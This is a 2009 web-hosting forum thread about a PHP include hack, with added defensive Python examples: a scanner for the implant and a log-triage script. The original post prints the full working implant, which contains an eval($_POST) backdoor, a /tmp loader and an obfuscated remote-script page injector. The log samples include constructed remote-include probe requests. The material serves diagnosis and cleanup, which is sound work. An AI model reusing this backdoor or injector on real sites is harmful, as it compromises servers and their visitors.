

iframe/php exploit again

Discussion in 'General Discussion' started by gertiebeth, Mar 16, 2009.

  1. gertiebeth, Well-Known Member (Jun 4, 2003; Minnesota, USA; cPanel Access Level: Root Administrator)

    I currently run 22 Linux servers using cPanel with heavy mod_security rules and a firewall. PHP has been hardened and many other security measures are in place. Right now I have 3 different people that I host who are suffering from PHP include hacks. It is only 3 people and their sites are hosted on several different servers. No one else is having a problem, which leads me to believe this is a problem with the user's PC. But for the life of me I cannot find out how to help them! I have tried Google, but I'm not quite sure what to search for. Here is an example of the malicious code that is being inserted into their index.php, admin.php and other files:

    <?php
    if(!function_exists('tmp_lkojfghx')){
        // Stage loader: include the first of /tmp/m1 .. /tmp/m9 that exists (a second-stage file dropped on the server).
        for($i=1;$i<10;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}
        // Backdoor: run arbitrary PHP supplied in a POST parameter.
        if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
        // Payload: base64 of an obfuscated <script> block that document.write()s a remote script include
        // (junk tokens are stripped client-side with .replace(), yielding <script src=//.../jquery.js>).
        if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdwR3YlM0NwR3Zzczd4Y3JpcEd2cHQlMjBod3pzcmMzZ0QlM0QlMkZod3olMkY3OCUyRVo3WjExMFo3WiUyRTE3T281R0Q4JTJFMjRIYjlPbyUyRmpPb3F1ZXJHRDh5JTJFSGJqc0dEOCUzRVo3WiUzQzNnRCUyRnNjWjdack9vaWh3enB0JTNFJykucmVwbGFjZSgvSGJ8T298b0t8cEd2fEdEOHwzZ0R8czd4fFo3Wnxod3ovZywiIikpOwogLS0+PC9zY3JpcHQ+'));
        // Output filter: inflates a gzip-encoded buffer, removes competing obfuscated <script> blocks
        // (eval/fromCharCode/document.write with long literal runs), then inserts the payload before
        // <body> (or appends it after </body> or </title>), re-gzipping if needed.
        function tmp_lkojfghx($s){
            if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));
            if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
                foreach($a[0] as $v)
                    if(count(explode("\n",$v))>5){
                        $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
                        if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
                    }
            $s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(".+?\n --></script>#','',$s);
            if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
            elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
            return $g?gzencode($s):$s;
        }
        // Installer: doubles as the PHP error handler (chaining to the previous one), then re-wraps every
        // existing output buffer inside ob_start('tmp_lkojfghx') so the filter sees the final page.
        function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
            $s=array();
            if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
            foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
            for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
            ob_start('tmp_lkojfghx');
            for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
        }
    }
    // Hook: register as the error handler (saving whatever was there) and install the filter immediately.
    if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
    tmp_lkojfghx2(); ?>
    Does anyone recognize this? All I've been able to find is problems back in 2008 with IX webhosting, which I have no affiliation with. All of my servers are managed by me from SoftLayer.

    Any help?
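A scanner for the implant shown in the post above, as an added example that is not from the thread. It keys on literal strings from the posted sample (the tmp_lkojfghx* names, the /tmp/m1..m9 loader, the TMP_XHGFJOKL constant), so it is a signature for this variant only; a reworked dropper with renamed functions would need new markers. SAMPLE and CLEAN are constructed inputs (the posted code, shortened, prepended to a one-line site file), and demo() builds a throwaway docroot from them.

```python
"""Find and strip the prepended PHP implant from the post above (added example)."""
import re
import tempfile
from pathlib import Path

# Literal indicators taken from the posted code, most specific first.
MARKERS = {
    "guard":      re.compile(r"function_exists\('tmp_lkojfghx'\)"),
    "tmp_loader": re.compile(r"is_file\(\$f='/tmp/m'\.\$i\)\)\s*\{?\s*include_once\(\$f\)"),
    "post_eval":  re.compile(r"eval\(\$_POST\['[A-Za-z0-9_]+'\]\)"),
    "payload":    re.compile(r"define\('TMP_XHGFJOKL',base64_decode\("),
    "ob_hook":    re.compile(r"ob_start\('tmp_lkojfghx'\)"),
    "err_hook":   re.compile(r"set_error_handler\('tmp_lkojfghx2'\)"),
}

# The implant is one <?php ... ?> block, from the guard to the final tmp_lkojfghx2(); call.
IMPLANT = re.compile(
    r"<\?php\s*if\(!function_exists\('tmp_lkojfghx'\)\).*?tmp_lkojfghx2\(\);\s*\?>", re.S)

SAMPLE = (  # constructed: the posted implant, shortened, in front of a one-line site file
    "<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<10;$i++)"
    "if(is_file($f='/tmp/m'.$i)){include_once($f);break;}"
    "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
    "if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdD4='));"
    "function tmp_lkojfghx($s){return $s;}"
    "function tmp_lkojfghx2(){ob_start('tmp_lkojfghx');}}"
    "if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;"
    "tmp_lkojfghx2(); ?>"
    "<?php\necho 'real site code';\n"
)
CLEAN = "<?php\necho 'real site code';\n"  # constructed: an untouched file


def scan_source(src):
    """Return which markers fire; 'infected' requires the guard plus at least one more."""
    hits = [name for name, rx in MARKERS.items() if rx.search(src)]
    return {"infected": "guard" in hits and len(hits) > 1, "markers": hits}


def strip_implant(src):
    """Remove the prepended block; returns (cleaned source, number of blocks removed)."""
    return IMPLANT.subn("", src)


def scan_tree(root, exts=(".php", ".inc", ".phtml")):
    """Walk a docroot and list infected files with the markers that fired."""
    found = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in exts:
            r = scan_source(p.read_text(errors="replace"))
            if r["infected"]:
                found.append((str(p.relative_to(root)), r["markers"]))
    return found


def demo():
    """Build a temporary docroot from the constructed samples and scan it."""
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "index.php").write_text(SAMPLE)
        (Path(root) / "admin.php").write_text(SAMPLE)
        (Path(root) / "about.php").write_text(CLEAN)
        return scan_tree(root)


if __name__ == "__main__":
    for path, markers in demo():
        print(f"{path}: {', '.join(markers)}")
```

Run scan_tree() against each account's document root before stripping anything, and treat a clean docroot with a populated /tmp/m1..m9 as still compromised: the loader includes those files, so they must be removed too, and the POST backdoor means any cleaned file can be re-seeded from the same source until the access path (stolen credentials or an include bug) is closed.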
  2. LiNUxG0d, Well-Known Member (Jun 25, 2003; Gatineau, Quebec, Canada)

    Typical source injections...

    The common things you can look at, on the server side, are these:

    - Locate references to .txt in a users domlogs (in the URI portion of accesses), to see if they logged in using a PHP include... there shouldn't be any if you run mod_sec heavily, but there might... :P

    - Check the /var/log/messages to see if the hackers have privs by password that the user may not be aware of.

    - Do the same, but for /usr/local/cpanel/logs/access_log (grep the users' username and sift through the IPs for oddballs)

    Are you locking down php.ini at all? (disable_functions)

    If the user has a cPanel with reseller privs, then you may need to reset their WHM password, as it may be compromised.

    Realistically, if it's 3 or so sites, I would think a keylogger on their home PC. If it's 3 or so SERVERS with 100+ accounts or something to that effect, I would think it may be rooted, depending on what's installed on it and how old your kernel is.

    There are - really - many many many guesstimatable factors in your equation... if there are no logs to prove intrusion, then I would suspect that the issue is more serious than you may think.

    Never take it lightly. I'm sure you don't. :)
    #2 LiNUxG0d, Mar 16, 2009
    Last edited: Mar 16, 2009
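The two server-side log checks in the post above (domlogs for remote-include URIs, the cPanel access_log for a customer's source IPs), as an added example that is not from the thread. The log lines are constructed; the cPanel access_log layout (IP, ident, username, [date], request, status, size) is assumed to be combined-log-like with the username in the third field, so check one real line against parse() before relying on it.

```python
"""Domlog and cPanel access_log triage for the checks suggested above (added example)."""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache combined log / cPanel access_log (assumed layout):
# ip ident user [date] "METHOD uri HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<date>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Constructed domlog excerpt: two remote-include probes pulling a .txt shell from a remote host.
DOMLOG_SAMPLE = """\
203.0.113.7 - - [16/Mar/2009:10:01:02 -0500] "GET /index.php?page=about HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.9 - - [16/Mar/2009:10:02:45 -0500] "GET /index.php?page=http://198.51.100.99/c.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.805"
198.51.100.9 - - [16/Mar/2009:10:02:50 -0500] "GET /admin.php?inc=http://198.51.100.99/id.txt HTTP/1.1" 200 730 "-" "libwww-perl/5.805"
203.0.113.7 - - [16/Mar/2009:10:03:10 -0500] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Constructed cPanel access_log excerpt: the customer's usual IP plus one odd IP editing files.
CPANEL_SAMPLE = """\
203.0.113.7 - gertie [03/16/2009:09:55:00 -0000] "GET /frontend/x3/index.html HTTP/1.1" 200 0 "" "Mozilla/5.0"
198.51.100.9 - gertie [03/16/2009:02:13:31 -0000] "GET /frontend/x3/filemanager/editit.html?file=index.php HTTP/1.1" 200 0 "" "Mozilla/4.0"
198.51.100.9 - gertie [03/16/2009:02:14:02 -0000] "POST /frontend/x3/filemanager/savefile.html HTTP/1.1" 200 0 "" "Mozilla/4.0"
203.0.113.7 - other [03/16/2009:09:58:00 -0000] "GET /frontend/x3/index.html HTTP/1.1" 200 0 "" "Mozilla/5.0"
"""


def parse(line):
    """Split one log line into fields, or None if it does not match the layout."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_requests(log_text):
    """(ip, uri) for requests whose query string carries a remote URL or a .txt target."""
    hits = []
    for line in log_text.splitlines():
        e = parse(line)
        if not e:
            continue
        query = urlsplit(e["uri"]).query
        for _, val in parse_qsl(query, keep_blank_values=True):
            v = val.lower()
            if v.startswith(("http://", "https://", "ftp://")) or v.rstrip("?").endswith(".txt"):
                hits.append((e["ip"], e["uri"]))
                break
    return hits


def user_ips(log_text, user):
    """Requests per source IP for one cPanel username."""
    counts = Counter()
    for line in log_text.splitlines():
        e = parse(line)
        if e and e["user"] == user:
            counts[e["ip"]] += 1
    return counts


def oddball_ips(log_text, user, known):
    """IPs that used the account but are not in the customer's known set."""
    return {ip: n for ip, n in user_ips(log_text, user).items() if ip not in known}


if __name__ == "__main__":
    for ip, uri in rfi_requests(DOMLOG_SAMPLE):
        print("RFI probe", ip, uri)
    print("odd cPanel logins:", oddball_ips(CPANEL_SAMPLE, "gertie", {"203.0.113.7"}))
```

On a real box the inputs are /usr/local/apache/domlogs/<domain> and /usr/local/cpanel/logs/access_log; the useful pivot is the intersection of the two results. An IP that both probed for remote includes and edited files through the File Manager under the customer's login points at stolen credentials rather than an include bug, which is the keylogger case the post describes.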
  3. AndyReed, Well-Known Member, PartnerNOC (May 29, 2004; Minneapolis, MN)

    There are several threads that discussed the iframe injection problem. Check out these threads: